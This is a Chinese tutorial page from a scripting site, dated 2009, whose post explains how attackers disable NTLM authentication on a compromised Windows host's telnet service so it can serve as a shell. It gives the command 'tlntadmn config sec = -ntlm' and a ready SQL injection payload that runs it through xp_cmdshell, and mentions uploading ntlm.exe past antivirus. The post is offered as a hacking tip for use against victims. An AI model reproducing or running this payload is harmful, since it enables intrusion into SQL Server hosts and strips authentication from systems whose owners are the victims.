当前位置: 首页 > 图文教程 > 脚本技术 > DOS/BAT > 一个小技巧 ntlm

DOS/BAT
检测ip格式是否正确的批处理
字符串拼接的批处理
字符串截取功能批处理
生成0-99之间的随机数列
用指定字符串替换指定内容
用某行内容替换特定字符
统计重复次数并排序的批处理
计算字符串的长度批处理
读取带敏感字符的行的批处理
批处理方式实现的目录比较工具
统计每个数的重复次数,并按照重复次数由高到低排序的批处理
计算字符串的长度的多种解决方案集锦
set 命令特殊用法
powercfg 命令 关闭显示器写法
文本文件乱序排列bat实现代码
批处理将非administrator用户全部禁掉的代码
批处理实现ping数据中文版
批处理显示当前ip(局域网)
本机开放的端口及使用该端口的进程的批处理
Windows 文件类型与打开方式定义方法

DOS/BAT 中的 一个小技巧 ntlm


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 93 ::
收藏到网摘: n/a

相信大家都对telnet比较熟悉吧。hacking的时候经常用到的系统自带shell尤其是注射的时候,但是最讨厌的就是ntlm认证了,以前大家去掉ntlm的方法一般有2种。
1 上传ntml.exe 这种方法有很多缺点,比如:对方有杀毒软件,很多网段屏蔽了TFTP.
2 直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。

今天我给大家介绍我一直在使用的办法,压箱底的哦。
那就是直接运行命令:tlntadmn config sec = -ntlm
注射的话可以直接运行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
运行以后就去掉了该死的ntlm认证:) 赶快去试试吧。